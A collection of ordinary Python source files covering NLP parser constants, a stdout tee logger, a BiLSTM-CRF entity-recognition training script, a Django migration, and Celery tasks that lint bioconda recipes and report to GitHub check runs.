Rule_B_Ner = "B_Ner"
Rule_Other = "Entity"
Other_Cats = {"person","thing",}
COMP = "0"
Rule_All_Constants = [Rule_Num,Rule_Constant,Rule_String,Rule_Ner]
Splish = "$£%%££%£%£%£%"  # sentinel string — presumably chosen to never occur in data; verify
Rule_Basics = Rule_All_Constants + [Rule_Frame,Rule_Concept,UNK_WORD,BOS_WORD,EOS_WORD,NULL_WORD,PAD_WORD]
RULE = 0
HIGH = 1
LOW = 2
# Regexes: frame sense suffix (e.g. "-01") and component suffix (e.g. "_1").
RE_FRAME_NUM = re.compile(r'-\d\d$')
RE_COMP = re.compile(r'_\d$')
end= re.compile(".txt\_[a-z]*")
epsilon = 1e-8
# Column indices of token-level text features.
TXT_WORD = 0
TXT_LEMMA = 1
TXT_POS = 2
TXT_NER = 3
# for AMR
AMR_CAT = 0
AMR_LE = 1
AMR_NER = 2
AMR_AUX = 2
AMR_LE_SENSE = 3
AMR_SENSE = 3
AMR_CAN_COPY = 4
# for DM
DM_POS = 0
DM_CAT = 1
DM_SENSE = 2
DM_LE = 3
DM_CAN_COPY = 4
DM_LE_CAN_COPY = 5
# For EDS
EDS_CAT = 0
EDS_TAG = 1
EDS_LE = 2
EDS_AUX = 3
EDS_CARG= 4
EDS_CAN_COPY = 5
# for PSD
PSD_POS = 0
PSD_LE = 1
PSD_SENSE = 2
PSD_CAN_COPY = 3
# index in sourceBatch
TOK_IND_SOURCE_BATCH=0
LEM_IND_SOURCE_BATCH=1
POS_IND_SOURCE_BATCH=2
NER_IND_SOURCE_BATCH=3
MWE_IND_SOURCE_BATCH=4
ANCHOR_IND_SOURCE_BATCH=5
TOTAL_INPUT_SOURCE=6
C_IND_SOURCE_BATCH=6
R_IND_SOURCE_BATCH=7
TRIPLE_IND_SOURCE_BATCH=8
CN_IND_SOURCE_BATCH=9
CC_IND_SOURCE_BATCH=10
threshold = 5
| StarcoderdataPython |
#!/usr/bin/env python
#
import sys
class Tee(object):
    """Redirect print output to the terminal as well as into a log file.

    Creating a ``Tee`` installs it as ``sys.stdout`` (unless ``nostdout`` is
    true), so subsequent output is mirrored to the optional log file.  The
    original stream is restored when the object is garbage collected.
    """

    def __init__(self, name=None, mode=None, nostdout=False):
        """Open log file *name* with *mode* and hook up the redirection.

        nostdout -- if true, write only to the file, never to the terminal.
        """
        self.file = None
        self.nostdout = nostdout
        self.stdout = None
        if not nostdout:
            # Keep a handle on the real stream so __del__ can restore it.
            # (The original stashed it on self.__del__.im_func — a Python 2
            # only hack that raises AttributeError on Python 3; a plain
            # instance attribute serves the same purpose portably.)
            self.stdout = sys.stdout
            sys.stdout = self
        if name is not None and mode is not None:
            self.filename = name
            self.filemode = mode
            self.file = open(name, mode)

    def __del__(self):
        """Restore stdout and close the log file when Tee is collected."""
        self.flush()  # commit all latest changes before exiting
        if not self.nostdout and self.stdout is not None:
            sys.stdout = self.stdout
        if self.file:
            self.file.close()
            self.file = None

    def write(self, data, end="\n", flush=True):
        """Write *data* followed by *end* to stdout and/or the log file."""
        if not self.nostdout:
            self.stdout.write(data+end)
        if self.file is not None:
            self.file.write(data+end)
        if flush:
            self.flush()

    def flush(self):
        """Force pending output out to the terminal and the log file."""
        if not self.nostdout:
            self.stdout.flush()
        if self.file is not None:
            self.file.flush()
| StarcoderdataPython |
# reinforcement-learning-omok — agents package initializer
# © 2020 지성. all rights reserved.
# <<EMAIL>>
# Apache License 2.0
from .base import *
from .naive import *
from .pg import *
from .predict import *
# train_so.py — BiLSTM-CRF training entry point (Bert-OverFlow)
# coding=utf-8
from __future__ import print_function
import optparse
import itertools
from collections import OrderedDict
import torch
import time
import pickle
from torch.optim import lr_scheduler
from torch.autograd import Variable
# import matplotlib.pyplot as plt #JT: commented it
import sys
import os
import json
import numpy as np
import codecs
# import Visdom #JT: commented it
# from utils import *
# from loader import *
# from config import opts
# from model_wo_char import BiLSTM_CRF
from model import BiLSTM_CRF
import utils_so as utils #JT: utils for SO
import loader_so as loader #JT: loader for SO
from config_so import parameters
from config_so import opts
from utils_so import Sort_Entity_by_Count
import shutil
# from evaluate_so import evaluating
# sys.path.append('../../utility/')
import print_result
import conlleval_py
import tolatex
import time
from Word_Freqency_Mapper import Word_Freqency_Mapper
# Make runs reproducible: deterministic cuDNN kernels plus fixed seeds for
# both torch and numpy, taken from the shared config.
torch.backends.cudnn.deterministic = True
torch.manual_seed(parameters["seed"])
np.random.seed(parameters["seed"])
# Sanity-check the configuration before any expensive work starts.
# NOTE: asserts are stripped under `python -O`; acceptable for a research script.
assert os.path.isfile(parameters["train"])
assert os.path.isfile(parameters["dev"])
assert os.path.isfile(parameters["test"])
assert parameters['char_dim'] > 0 or parameters['word_dim'] > 0
assert 0. <= parameters['dropout'] < 1.0
assert parameters['tag_scheme'] in ['iob', 'iobes']
assert not parameters['all_emb'] or parameters['pre_emb']
assert not parameters['pre_emb'] or parameters['word_dim'] > 0
# assert not parameters['pre_emb'] or os.path.isfile(parameters['pre_emb'])
def create_frequecny_vector():
    """Build Gaussian-binned word-frequency vectors from the training data
    and write them (for train/dev/test vocabulary) to
    ``parameters['freq_vector_file']``.
    """
    # BUGFIX: the original constructed this parameterized mapper and then
    # immediately replaced it with a default-constructed Word_Freqency_Mapper(),
    # silently discarding freq_mapper_bin_count / freq_mapper_bin_width.
    freq_mapper = Word_Freqency_Mapper(
        bins=parameters["freq_mapper_bin_count"],
        w=parameters["freq_mapper_bin_width"],
    )
    freq_mapper.Find_Train_Data_Freq(parameters["train"])
    freq_mapper.Read_Dev_Data(parameters["dev"])
    freq_mapper.Read_Test_Data(parameters["test"])
    freq_mapper.Find_Gaussian_Bining_For_Training_Data_Freq()
    freq_mapper.Find_Freq_Vector_for_words()
    freq_mapper.Write_Freq_To_File(parameters['freq_vector_file'])
def save_char_embed(sentence_words, char_embed_dict, char_embed_vectors):
    """Record the character-level embedding of each token in *sentence_words*.

    Position i of *char_embed_vectors* is stored under the token at position i;
    a token seen again keeps its most recent vector.  Mutates and returns
    *char_embed_dict*.
    """
    for position, word in enumerate(sentence_words):
        char_embed_dict[word] = char_embed_vectors[position]
    return char_embed_dict
def read_ctc_pred_file():
    """Load token-level code-recognizer (CTC) predictions.

    Reads ``parameters['ctc_pred']``, a tab-separated file whose first column
    is the token and whose last column is the predicted label, skipping blank
    lines.  Returns a dict mapping token -> prediction (last occurrence wins).
    """
    ctc_pred_dict = {}
    # BUGFIX: the original iterated over open(...) without ever closing the
    # handle; `with` guarantees the file is released.
    with open(parameters["ctc_pred"]) as pred_file:
        for line in pred_file:
            if line.strip() == "":
                continue
            line_values = line.strip().split("\t")
            word, ctc_pred = line_values[0], line_values[-1]
            ctc_pred_dict[word] = ctc_pred
    return ctc_pred_dict
def prepare_train_set_dev_data():
    """Load and index the train/dev/test corpora and build embedding tables.

    Steps: optionally (re)build word-frequency vectors, load CTC predictions,
    select the entity tag set for the configured category, load and
    tag-scheme-convert the sentences, build word/char/tag vocabularies
    (optionally augmented from pretrained embeddings), and initialize the
    word / frequency / segmentation / CTC embedding matrices.

    Returns (train_data, dev_data, test_data, word_to_id, id_to_word,
    tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds,
    seg_pred_embeds, ctc_pred_embeds).
    """
    lower = parameters['lower']
    zeros = parameters['zeros']
    tag_scheme = parameters['tag_scheme']
    # Optionally regenerate the Gaussian-binned frequency vectors file.
    if parameters['use_freq_vector']:
        create_frequecny_vector()
    # Token -> code-recognizer prediction, used as an extra input feature.
    ctc_pred_dict = read_ctc_pred_file()
    print("completed ctc predictions reading ")
    # Merge labels in the training file and rank entity types by frequency;
    # the 6 rarest types are dropped, then the set is restricted to the
    # configured category (code vs. human-language entities).
    input_train_file=utils.Merge_Label(parameters["train"])
    Sort_Entity_by_Count(input_train_file,parameters["sorted_entity_list_file_name"])
    with open(parameters["sorted_entity_list_file_name"]) as f:
        sorted_entity_list = json.load(f)
    set_of_selected_tags=[]
    entity_category_code=parameters["entity_category_code"]
    entity_category_human_language=parameters["entity_category_human_language"]
    set_of_selected_tags.extend(sorted_entity_list[0:-6])
    if parameters['entity_category']=='code':
        # Drop human-language entity types when training the code model.
        for entity in entity_category_human_language:
            if entity in entity_category_human_language and entity in set_of_selected_tags:
                set_of_selected_tags.remove(entity)
    if parameters['entity_category']=='human_lang':
        # Drop code entity types; 'Algorithm' is always kept.
        for entity in entity_category_code:
            if entity in entity_category_code and entity in set_of_selected_tags:
                set_of_selected_tags.remove(entity)
        if 'Algorithm' not in set_of_selected_tags:
            set_of_selected_tags.append('Algorithm')
    if parameters['entity_category']=='all':
        if 'Algorithm' not in set_of_selected_tags:
            set_of_selected_tags.append('Algorithm')
    print("set of entities: ", set_of_selected_tags)
    merge_tags=parameters['merge_tags']
    train_sentences = loader.load_sentences_so_w_pred(parameters["train"], parameters["train_pred"], lower, zeros,merge_tags, set_of_selected_tags)
    # In "dev" mode evaluate on the dev split, in "test" mode on the test
    # split; either way the evaluation split is aliased to both dev and test.
    if parameters["mode"]=="dev":
        dev_sentences = loader.load_sentences_so_w_pred(parameters["dev"], parameters["dev_pred"],lower, zeros,merge_tags, set_of_selected_tags)
        test_sentences = dev_sentences
    elif parameters["mode"]=="test":
        dev_sentences = loader.load_sentences_so_w_pred(parameters["test"], parameters["test_pred"],lower, zeros,merge_tags, set_of_selected_tags)
        test_sentences = dev_sentences
    # Convert tag annotations to the configured scheme (iob / iobes).
    loader.update_tag_scheme(train_sentences, tag_scheme)
    loader.update_tag_scheme(dev_sentences, tag_scheme)
    loader.update_tag_scheme(test_sentences, tag_scheme)
    # Vocabularies are built from the training split only.
    dico_words_train = loader.word_mapping(train_sentences, lower)[0]
    dico_chars, char_to_id, id_to_char = loader.char_mapping(train_sentences)
    dico_tags, tag_to_id, id_to_tag = loader.tag_mapping(train_sentences)
    # Optionally extend the vocabulary with dev/test words that have
    # pretrained embeddings, so they are not mapped to <unk>.
    if parameters['all_emb']:
        all_dev_test_words=[w[0][0] for w in dev_sentences+test_sentences]
    else:
        all_dev_test_words = []
    if parameters['use_pre_emb']:
        dico_words, word_to_id, id_to_word = loader.augment_with_pretrained(
            dico_words_train.copy(),
            parameters['pre_emb'],
            all_dev_test_words
        )
    else:
        dico_words = dico_words_train
        word_to_id, id_to_word = loader.create_mapping(dico_words_train.copy())
    train_data = loader.prepare_dataset(train_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
    dev_data = loader.prepare_dataset(dev_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
    test_data = loader.prepare_dataset(test_sentences, word_to_id, char_to_id, tag_to_id,ctc_pred_dict, lower)
    # Frequency vectors: text file of "word v1 ... v_freq_dim" lines.
    all_freq_embed={}
    for line in open(parameters['freq_vector_file']):
        s = line.strip().split()
        if len(s) == parameters['freq_dim'] + 1:
            all_freq_embed[s[0]] = np.array([float(i) for i in s[1:]])
        else:
            print("freq dim mismatch: ","required: ", parameters['freq_dim'], "given: ",len(s)-1)
    # Random-uniform init, overwritten where a frequency vector exists
    # (exact-case match first, lowercase fallback).
    freq_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['freq_dim']))
    for w in word_to_id:
        if w in all_freq_embed:
            freq_embeds[word_to_id[w]] = all_freq_embed[w]
        elif w.lower() in all_freq_embed:
            freq_embeds[word_to_id[w]] = all_freq_embed[w.lower()]
    # Pretrained word embeddings, same overwrite-on-match strategy.
    all_word_embeds = {}
    if parameters['use_pre_emb']:
        for i, line in enumerate(codecs.open(parameters['pre_emb'] , 'r', 'utf-8')):
            s = line.strip().split()
            if len(s) == parameters['word_dim'] + 1:
                all_word_embeds[s[0]] = np.array([float(i) for i in s[1:]])
    word_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['word_dim']))
    # Embedding tables for the segmentation and code-recognizer predictions.
    seg_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['segmentation_count'] , parameters['segmentation_dim']))
    ctc_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_recognizer_count'], parameters['code_recognizer_dim']))
    if parameters['use_pre_emb']:
        for w in word_to_id:
            if w in all_word_embeds:
                word_embeds[word_to_id[w]] = all_word_embeds[w]
            elif w.lower() in all_word_embeds:
                word_embeds[word_to_id[w]] = all_word_embeds[w.lower()]
    return train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds
# vis = visdom.Visdom() #JT: no need of visualization for now
# sys.stdout.flush()
def evaluating(model, datas, best_F, epoch_count, phase_name):
    """Run the model over *datas* and score predictions with conlleval.

    Writes a "word gold pred" prediction file, scores it both with the
    Python port and the official Perl script, appends the overall P/R/F1 to
    the per-epoch performance log, and tracks the best F1 seen so far.

    Relies on module-level globals: parameters, tag_to_id, id_to_tag,
    use_gpu, eval_script.

    Returns (best_F, new_F, save) where save is True iff this evaluation
    improved on *best_F*.
    """
    fout_per_epoch = open(parameters["perf_per_epoch_file"],'a')
    print("-----------------------------------")
    print("now evaluating: ",phase_name)
    print("-----------------------------------")
    prediction = []
    save = False
    new_F = 0.0
    # -2 excludes the CRF's synthetic <start>/<stop> tags.
    confusion_matrix = torch.zeros((len(tag_to_id) - 2, len(tag_to_id) - 2))
    iter_count=0
    for data in datas:
        ground_truth_id = data['tags']
        words = data['str_words']
        chars2 = data['chars']
        caps = data['caps']
        sentence_seg_preds = data['seg_pred']
        sentence_ctc_preds = data['ctc_pred']
        if parameters['char_mode'] == 'LSTM':
            # Sort char sequences by length for packing; d maps sorted
            # positions back to original ones.
            chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
            d = {}
            for i, ci in enumerate(chars2):
                for j, cj in enumerate(chars2_sorted):
                    if ci == cj and not j in d and not i in d.values():
                        d[j] = i
                        continue
            chars2_length = [len(c) for c in chars2_sorted]
            char_maxl = max(chars2_length)
            chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
            for i, c in enumerate(chars2_sorted):
                chars2_mask[i, :chars2_length[i]] = c
            chars2_mask = Variable(torch.LongTensor(chars2_mask))
        if parameters['char_mode'] == 'CNN':
            # CNN path keeps the original order; only zero-padding is needed.
            d = {}
            chars2_length = [len(c) for c in chars2]
            char_maxl = max(chars2_length)
            chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
            for i, c in enumerate(chars2):
                chars2_mask[i, :chars2_length[i]] = c
            chars2_mask = Variable(torch.LongTensor(chars2_mask))
        dwords = Variable(torch.LongTensor(data['words']))
        sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
        sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
        dcaps = Variable(torch.LongTensor(caps))
        if use_gpu:
            val, out = model(words, dwords.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), chars2_mask.cuda(), dcaps.cuda(), chars2_length, d)
        else:
            val, out = model(words, dwords, sentence_seg_preds, sentence_ctc_preds, chars2_mask, dcaps, chars2_length, d)
        predicted_id = out
        for (word, true_id, pred_id) in zip(words, ground_truth_id, predicted_id):
            line = ' '.join([word, id_to_tag[true_id], id_to_tag[pred_id]])
            prediction.append(line)
            confusion_matrix[true_id, pred_id] += 1
        # Blank line separates sentences in CoNLL format.
        prediction.append('')
    predf = parameters["eval_temp"] + '/pred.' + phase_name +"_"+str(epoch_count)
    scoref = parameters["eval_temp"] + '/score.' + phase_name+"_"+str(epoch_count)
    with open(predf, 'w') as f:
        f.write('\n'.join(prediction))
    # Score twice: Python port (structured result) and Perl script (report).
    eval_result = conlleval_py.evaluate_conll_file(inputFile=predf)
    os.system('%s < %s > %s' % (eval_script, predf, scoref))
    eval_lines = [l.rstrip() for l in codecs.open(scoref, 'r', 'utf8')]
    for i, line in enumerate(eval_lines):
        print(line)
        if i == 1:
            # Second line of the conlleval report ends with the overall FB1.
            new_F = float(line.strip().split()[-1])
            if new_F > best_F:
                best_F = new_F
                save = True
                print('the best F is ', new_F)
    # Only print the per-entity breakdown for dev/test, not for train.
    if phase_name=="dev" or phase_name=="test":
        print_result.print_result(eval_result, epoch_count, parameters["sorted_entity_list_file_name"], parameters["entity_category_code"], parameters["entity_category_human_language"])
        print("-----------------------------------")
    over_all_p=eval_result['overall']['P']
    over_all_r=eval_result['overall']['R']
    over_all_f1=eval_result['overall']['F1']
    op_line = phase_name+ ": epoch: "+str(epoch_count) +" P: "+ str(over_all_p)+" R: "+str(over_all_r)+" F1: "+str(over_all_f1)+"\n"
    fout_per_epoch.write(op_line)
    fout_per_epoch.flush()
    return best_F, new_F, save
def train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data):
    """Train the BiLSTM-CRF for parameters['epochs'] epochs.

    Each epoch iterates the training data in a fresh random order, performs
    one optimizer step per sentence with gradient clipping, then evaluates
    on the train split and on the dev (or test) split; the model is saved
    whenever the dev/test F1 improves, and a per-epoch snapshot is always
    written to parameters['models_path'].

    Relies on module-level globals: parameters, use_gpu, model_name,
    learning_rate.  Returns char_embed_dict (unused/empty unless the
    commented-out char-embedding dump is re-enabled).
    """
    char_embed_dict = {}
    losses = []
    loss = 0.0
    best_dev_F = -1.0
    best_test_F = -1.0
    best_train_F = -1.0
    all_F = [[0, 0, 0]]
    plot_every = 10
    eval_every = 20
    count = 0
    model.train(True)
    start = time.time()
    for epoch in range(1, parameters["epochs"]+1):
        print("---------epoch count: ", epoch)
        for i, index in enumerate(np.random.permutation(len(train_data))):
            tr = time.time()
            count += 1
            data = train_data[index]
            # A data instance is a dict with keys: 'str_words' (tokens),
            # 'words' (word ids), 'chars' (per-token char ids), 'caps'
            # (capitalization features), 'tags' (label ids), plus the
            # 'seg_pred' / 'ctc_pred' auxiliary prediction features.
            model.zero_grad()
            sentence_in = data['words']
            sentence_tokens=data['str_words']
            sentence_seg_preds = data['seg_pred']
            sentence_ctc_preds = data['ctc_pred']
            tags = data['tags']
            chars2 = data['chars']
            sentence_in = Variable(torch.LongTensor(sentence_in))
            sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
            sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
            ######### char lstm
            if parameters['char_mode'] == 'LSTM':
                # Sort char sequences by length for packing; d maps sorted
                # positions back to original ones.
                chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
                d = {}
                for i, ci in enumerate(chars2):
                    for j, cj in enumerate(chars2_sorted):
                        if ci == cj and not j in d and not i in d.values():
                            d[j] = i
                            continue
                chars2_length = [len(c) for c in chars2_sorted]
                char_maxl = max(chars2_length)
                chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
                for i, c in enumerate(chars2_sorted):
                    chars2_mask[i, :chars2_length[i]] = c
                chars2_mask = Variable(torch.LongTensor(chars2_mask))
            # ######## char cnn
            if parameters['char_mode'] == 'CNN':
                d = {}
                chars2_length = [len(c) for c in chars2]
                char_maxl = max(chars2_length)
                chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
                for i, c in enumerate(chars2):
                    chars2_mask[i, :chars2_length[i]] = c
                chars2_mask = Variable(torch.LongTensor(chars2_mask))
            targets = torch.LongTensor(tags)
            caps = Variable(torch.LongTensor(data['caps']))
            if use_gpu:
                neg_log_likelihood = model.neg_log_likelihood(sentence_tokens, sentence_in.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), targets.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d)
            else:
                neg_log_likelihood = model.neg_log_likelihood(sentence_tokens,sentence_in,sentence_seg_preds,sentence_ctc_preds, targets, chars2_mask, caps, chars2_length, d)
            # Normalize per-token so sentence length doesn't skew the logged loss.
            loss += neg_log_likelihood.data.item() / len(data['words'])
            neg_log_likelihood.backward()
            # Clip gradients to stabilize CRF training.
            torch.nn.utils.clip_grad_norm_(model.parameters(), 5.0)
            optimizer.step()
            if count % len(train_data) == 0:
                # Decay the learning rate once per full pass over the data.
                utils.adjust_learning_rate(optimizer, lr=learning_rate/(1+0.05*count/len(train_data)))
        # Evaluate after each epoch: train split first, then dev or test
        # depending on parameters["mode"].
        model.train(False)
        best_train_F, new_train_F, _ = evaluating(model, train_data, best_train_F, epoch, "train")
        if parameters["mode"]=="dev":
            phase_name="dev"
        else:
            phase_name="test"
        best_dev_F, new_dev_F, save = evaluating(model, dev_data, best_dev_F, epoch, phase_name)
        if save:
            # Persist the best-so-far model under the canonical name.
            torch.save(model, model_name)
        # Test-set evaluation is disabled in this setup.
        best_test_F, new_test_F = 0, 0
        all_F.append([new_train_F, new_dev_F, new_test_F])
        step_lr_scheduler.step()
        # Always snapshot the model for this epoch so the optimal epoch can
        # be selected after the fact.
        PATH=parameters["models_path"]+"/model_epoch."+str(epoch)
        torch.save(model, PATH)
        model.train(True)
        end = time.time()
        time_in_this_epoch = end - start
        print("time in this epoch: ", time_in_this_epoch, "secs")
        start=end
    return char_embed_dict
# Script entry point: prepare the datasets, build the BiLSTM-CRF model,
# train it, and clean up temporary evaluation artifacts afterwards.
if __name__ == '__main__':
    eval_script = parameters["eval_script"]
    eval_temp = parameters["eval_temp"]
    # Remove any stale evaluation scratch directory; ignore if absent.
    try:
        shutil.rmtree(eval_temp)
    except Exception as e:
        pass
    # Truncate the per-epoch performance log so this run starts fresh.
    fout_per_epoch = open(parameters["perf_per_epoch_file"], 'w')
    fout_per_epoch.close()
    if not os.path.isfile(eval_script):
        raise Exception('CoNLL evaluation script not found at "%s"' % eval_script)
    if not os.path.exists(eval_temp):
        os.makedirs(eval_temp)
    if not os.path.exists(parameters["models_path"]):
        os.makedirs(parameters["models_path"])
    # Load datasets, vocabularies and pre-trained embedding matrices.
    train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds = prepare_train_set_dev_data()
    use_gpu = parameters['use_gpu']
    gpu_id = parameters["gpu_id"]
    name = parameters['name']
    model_name = parameters["models_path"] + name  # get_name(parameters)
    tmp_model = model_name + '.tmp'
    model = BiLSTM_CRF(vocab_size=len(word_to_id),
                       tag_to_ix=tag_to_id,
                       embedding_dim=parameters['word_dim'],
                       freq_embed_dim=parameters['freq_dim'],
                       markdown_embed_dim=parameters['markdown_dim'],
                       seg_pred_embed_dim=parameters['segmentation_dim'],
                       hidden_dim=parameters['word_lstm_dim'],
                       use_gpu=use_gpu,
                       char_to_ix=char_to_id,
                       pre_word_embeds=word_embeds,
                       word_freq_embeds=freq_embeds,
                       word_seg_pred_embeds=seg_pred_embeds,
                       word_ctc_pred_embeds=ctc_pred_embeds,
                       use_crf=parameters['crf'],
                       char_mode=parameters['char_mode'],
                       # n_cap=4,
                       # cap_embedding_dim=10
                       )
    # Optionally resume training from a previously saved state dict.
    if parameters['reload']:
        model.load_state_dict(torch.load(model_name))
    if use_gpu:
        GPU_id = gpu_id
        print("GPU ID = ", GPU_id)
        torch.cuda.set_device(GPU_id)
        model.cuda()
    learning_rate = parameters["LR"]
    # SGD with momentum; LR additionally decays by 0.8 every 5 epochs.
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9)
    step_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.8)
    t = time.time()
    train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data)
    print("total time in training: ", time.time() - t)
    # Best-effort cleanup of the sorted-entity scratch file.
    try:
        os.remove(parameters["sorted_entity_list_file_name"])
    except Exception as e:
        pass
| StarcoderdataPython |
1688013 | # Generated by Django 2.1.5 on 2019-02-10 12:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``game_type`` integer field (default 0) to the quiz ``Game`` model."""

    dependencies = [
        ('quiz', '0002_auto_20190210_1144'),
    ]

    operations = [
        migrations.AddField(
            model_name='game',
            name='game_type',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
| StarcoderdataPython |
3333698 | """
Celery Tasks
"""
import logging
import os
import time
from collections import namedtuple
from typing import TYPE_CHECKING
from .worker import celery
from .config import BOT_NAME, BOT_EMAIL
from .. import utils
from ..recipe import Recipe
from ..githandler import TempGitHandler
from ..githubhandler import CheckRunStatus, CheckRunConclusion
if TYPE_CHECKING:
from .worker import AsyncTask
from typing import Dict
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
# Lightweight record describing a pull request and the recipes it touches.
PRInfo = namedtuple('PRInfo', 'installation user repo ref recipes issue_number')
class Checkout:
    # We can't use contextlib.contextmanager because these are async and
    # asynccontextmanager is only available in Python >3.7
    """Async context manager checking out git repo

    Args:
        ghapi: GitHub API handle providing token, user and repo.
        ref: optional sha checksum to checkout (only if issue_number not given)
        issue_number: optional issue number to checkout (only if ref not given)

    Returns `None` if the checkout failed, otherwise the TempGitHandler object

    >>> with Checkout(ghapi, issue_number) as git:
    >>>    if git is None:
    >>>        print("checkout failed")
    >>>    else:
    >>>        for filename in git.list_changed_files():
    """
    def __init__(self, ghapi, ref=None, issue_number=None):
        self.ghapi = ghapi
        self.orig_cwd = None   # cwd to restore when the context exits
        self.git = None        # TempGitHandler once checked out
        self.ref = ref
        self.issue_number = issue_number

    async def __aenter__(self):
        try:
            if self.issue_number:
                # Resolve the PR's head fork/branch so we can check it out.
                prs = await self.ghapi.get_prs(number=self.issue_number)
                fork_user = prs['head']['user']['login']
                fork_repo = prs['head']['repo']['name']
                branch_name = prs['head']['ref']
                ref = None
            else:
                fork_user = None
                fork_repo = None
                branch_name = "unknown"
                ref = self.ref
            self.git = TempGitHandler(
                password=self.ghapi.token,
                home_user=self.ghapi.user,
                home_repo=self.ghapi.repo,
                fork_user=fork_user,
                fork_repo=fork_repo
            )
            self.git.set_user(BOT_NAME, BOT_EMAIL)
            # Work inside the temporary clone; cwd is restored in __aexit__.
            self.orig_cwd = os.getcwd()
            os.chdir(self.git.tempdir.name)
            branch = self.git.create_local_branch(branch_name, ref)
            if not branch:
                raise RuntimeError(f"Failed to checkout branch {branch_name} from {self.git}")
            branch.checkout()
            return self.git
        except Exception:
            # FIX: use lazy %-formatting instead of an eagerly-built f-string;
            # logger.exception records the traceback, so the binding was unused.
            logger.exception("Error while checking out with %s", self.ghapi)
            return None

    async def __aexit__(self, _exc_type, _exc, _tb):
        if self.orig_cwd:
            os.chdir(self.orig_cwd)
        if self.git:
            self.git.close()
@celery.task(acks_late=True, ignore_result=False)
async def get_latest_pr_commit(issue_number: int, ghapi):
    """Return the SHA of the newest commit on the given pull request.

    Iterates every commit and keeps only the final one seen; yields the
    sentinel ``None`` when the PR has no commits at all.
    """
    newest = {'sha': None}
    # Exhaust the async iterator; whatever remains bound is the last commit.
    async for newest in await ghapi.iter_pr_commits(issue_number):
        pass
    return newest['sha']
@celery.task(acks_late=True)
async def create_check_run(head_sha: str, ghapi):
    """Create a "Linting Recipe(s)" check run for the given commit SHA."""
    # FIX: these are routine progress traces, not errors/warnings — the
    # original error/warning levels were debugging leftovers.
    logger.info("create_check_run: %s %s", head_sha, ghapi)
    check_run_number = await ghapi.create_check_run("Linting Recipe(s)", head_sha)
    logger.info("Created check run %s", check_run_number)
@celery.task(acks_late=True)
async def bump(issue_number: int, ghapi):
    """Bump the build number in each recipe"""
    logger.info("Processing bump command: %s", issue_number)
    async with Checkout(ghapi, issue_number=issue_number) as git:
        if not git:
            logger.error("Failed to checkout")
            return
        recipes = git.get_changed_recipes()
        # Increment build/number in-place for every changed recipe.
        for meta_fn in recipes:
            recipe = Recipe.from_file('recipes', meta_fn)
            buildno = int(recipe.meta['build']['number']) + 1
            recipe.reset_buildnumber(buildno)
            recipe.save()
        # NOTE(review): all changed recipes are committed in one push, but the
        # commit message references only the last recipe/buildno from the loop
        # — confirm this is intended when several recipes change.
        msg = f"Bump {recipe} buildno to {buildno}"
        if not git.commit_and_push_changes(recipes, None, msg, sign=True):
            logger.error("Failed to push?!")
@celery.task(acks_late=True)
async def lint_check(check_run_number: int, ref: str, ghapi):
    """Execute linter
    """
    # Abbreviate full-length (40-char) SHAs for log readability.
    ref_label = ref[:8] if len(ref) >= 40 else ref
    logger.info("Starting lint check for %s", ref_label)
    await ghapi.modify_check_run(check_run_number, status=CheckRunStatus.in_progress)
    async with Checkout(ghapi, ref=ref) as git:
        if not git:
            # Checkout failed: cancel the check run with an explanation.
            await ghapi.modify_check_run(
                check_run_number,
                status=CheckRunStatus.completed,
                conclusion=CheckRunConclusion.cancelled,
                output_title=
                f"Failed to check out "
                f"{ghapi.user}/{ghapi.repo}:{ref_label}"
            )
            return
        recipes = git.get_changed_recipes()
        if not recipes:
            # Nothing to lint: finish with a neutral conclusion.
            await ghapi.modify_check_run(
                check_run_number,
                status=CheckRunStatus.completed,
                conclusion=CheckRunConclusion.neutral,
                output_title="No recipes modified",
                output_summary=
                "This branch does not modify any recipes! "
                "Please make sure this is what you intend. Upon merge, "
                "no packages would be built."
            )
            return
        utils.load_config('config.yml')
        # Imported lazily: bioconda_utils.linting is heavy and only needed here.
        from bioconda_utils.linting import lint as _lint, LintArgs, markdown_report
        df = _lint(recipes, LintArgs())
        annotations = []
        if df is None:
            # lint() returns None when no problems were found.
            conclusion = CheckRunConclusion.success
            title = "All recipes in good condition"
            summary = "No problems found"
        else:
            conclusion = CheckRunConclusion.failure
            title = "Some recipes had problems"
            summary = "Please fix the listed issues"
            # Convert each lint failure row into a GitHub check annotation.
            for _, row in df.iterrows():
                check = row['check']
                info = row['info']
                recipe = row['recipe']
                annotations.append({
                    'path': recipe + '/meta.yaml',
                    'start_line': info.get('start_line', 1),
                    'end_line': info.get('end_line', 1),
                    'annotation_level': 'failure',
